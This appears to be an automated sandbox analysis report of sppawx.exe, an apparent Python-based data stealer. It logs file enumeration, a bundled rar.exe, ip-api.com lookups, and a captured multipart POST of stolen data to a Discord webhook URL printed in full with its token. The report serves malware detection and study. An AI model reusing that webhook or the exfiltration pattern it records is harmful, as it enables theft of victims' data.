              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: sppawx.exe, 00000000.00000003.1294996044.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1757151271.00007FFEF5CF1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: sppawx.exe, 00000000.00000003.1294996044.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1757151271.00007FFEF5CF1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752661603.00007FFEDD411000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000000.1619209555.00007FF625720000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF79A3183B0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3192F0 FindFirstFileExW,FindClose,0_2_00007FF79A3192F0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF79A3318E4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3192F0 FindFirstFileExW,FindClose,2_2_00007FF79A3192F0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF79A3183B0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF79A3318E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256D46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,103_2_00007FF6256D46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6257188E0 FindFirstFileExA,103_2_00007FF6257188E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256CE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,103_2_00007FF6256CE21C

              Networking

              barindex
              Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpString found in memory: ifdapp1xmpexifunknownsubinteropgpsapp0app13iptcirb8bimiptc8bimResInfo8bimiptcdigestthumbtEXtxmpstructxmpbagxmpseqxmpaltlogscrdescimgdescgrctlextappextcommentextcomchrominanceluminancegAMAbKGDiTXtcHRMhISTiCCPsRGBtIMEddsInfoheifPropsheifHDRANIMANMFbmppngicocurjpgtiffgifwmphotoddsadngheifwebprdfhttp://www.w3.org/1999/02/22-rdf-syntax-ns#dchttp://purl.org/dc/elements/1.1/xmphttp://ns.adobe.com/xap/1.0/xmpidqhttp://ns.adobe.com/xmp/Identifier/qual/1.0/xmpRightshttp://ns.adobe.com/xap/1.0/rights/xmpMMhttp://ns.adobe.com/xap/1.0/mm/xmpBJhttp://ns.adobe.com/xap/1.0/bj/xmpTPghttp://ns.adobe.com/xap/1.0/t/pg/pdfhttp://ns.adobe.com/pdf/1.3/photoshophttp://ns.adobe.com/photoshop/1.0/tiffhttp://ns.adobe.com/tiff/1.0/exifhttp://ns.adobe.com/exif/1.0/stDimhttp://ns.adobe.com/xap/1.0/sType/Dimensions#xapGImghttp://ns.adobe.com/xap/1.0/g/img/stEvthttp://ns.adobe.com/xap/1.0/sType/ResourceEvent#stRefhttp://ns.adobe.com/xap/1.0/sType/ResourceRef#stVerhttp://ns.adobe.com/xap/1.0/sType/Version#stJobhttp://ns.adobe.com/xap/1.0/sType/Job#auxhttp://ns.adobe.com/exif/1.0/aux/crshttp://ns.adobe.com/camera-raw-settings/1.0/xmpDMhttp://ns.adobe.com/xmp/1.0/DynamicMedia/Iptc4xmpCorehttp://iptc.org/std/Iptc4xmpCore/1.0/xmlns/MicrosoftPhotohttp://ns.microsoft.com/photo/1.0/MPhttp://ns.microsoft.com/photo/1.2/MPRIhttp://ns.microsoft.com/photo/1.2/t/RegionInfo#MPReghttp://ns.microsoft.com/photo/1.2/t/Region#rdfhttp://www.w3.org/1999/02/22-rdf-syntax-ns#dchttp://purl.org/dc/elements/1.1/xmphttp://ns.adobe.com/xap/1.0/xmpidqhttp://ns.adobe.com/xmp/Identifier/qual/1.0/xmpRightshttp://ns.adobe.com/xap/1.0/rights/xmpMMhttp://ns.adobe.com/xap/1.0/mm/xmpBJhttp://ns.adobe.com/xap/1.0/bj/xmpTPghttp://ns.adobe.com/xap/1.0/t/pg/pdfhttp://ns.adobe.com/pdf/1.3/photoshophttp://ns.adobe.com/photoshop/1.0/tiffhttp://ns.adobe.com/tiff/1.0/exifhttp://ns.adobe.com/exif/1.0/rrrstDimhttp://ns.adobe.com/xap/1.0/sType/Dimensions#xapGImghttp://ns.adobe.com/xap/1.0/g/img/stEvthttp://ns.adobe.com/xap/1.0/sType/ResourceEvent#stRefhttp://ns.adobe.com/xap/1.0/sType/ResourceRef#stVerhttp://ns.adobe.com/xap/1.0/sType/Version#stJobhttp://ns.adobe.com/xap/1.0/sType/Job#auxhttp://ns.adobe.com/exif/1.0/aux/crshttp://ns.adobe.com/camera-raw-settings/1.0/xmpDMhttp://ns.adobe.com/xmp/1.0/DynamicMedia/Iptc4xmpCorehttp://iptc.org/std/Iptc4xmpCore/1.0/xmlns/MicrosoftPhotohttp://ns.microsoft.com/photo/1.0/MPhttp://ns.microsoft.com/photo/1.2/MPRIhttp://ns.microsoft.com/photo/1.2/t/RegionInfo#MPReghttp://ns.microsoft.com/photo/1.2/t/Region#
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD276268 recv,2_2_00007FFEDD276268
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: blank-jfr1z.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 694302User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=4574e7a3c3bceb293e441457fd5f9388
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 07:38:40 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734075521x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tx%2BJOy3W%2Fj6%2FZNhfBMrLuKCjk2aniXvX%2Bevuba68UlAfsef62gGbltAlNJ1TBi%2BhHRmPnZnM1fNgXqNAS3R2E6O%2FdyIWFAugz4daKez7DSO%2FfNDcG4xbQSJQ31%2Bl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=7c9e703a624a385c05903c9da053e83e56587a9a-1734075520; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=kMelNpAhNdRlaZ1Uw0BI93eBNOmpVEH9iE4vc1SB4ww-1734075520206-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f144bba1e6742d7-EWR
              Source: sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi2
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co2
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000002.1761232233.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000002.1761232233.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: sppawx.exe, 00000002.00000003.1744355401.0000018C7F7EB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F7B7000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F7B7000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1739346668.0000018C7F833000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747473298.0000018C7E7B1000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F7EC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749970875.0000018C7F833000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1429649617.000002724C8D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1603530749.000001AF5478D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: sppawx.exe, 00000002.00000002.1748973373.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1744275263.0000018C7F726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodx
              Source: powershell.exe, 0000000B.00000002.1432087978.000002724CBE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000002.1761232233.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
